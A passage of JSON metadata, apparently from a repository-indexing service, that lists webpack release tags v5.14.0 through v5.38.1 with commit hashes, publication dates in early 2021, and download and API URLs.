","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/w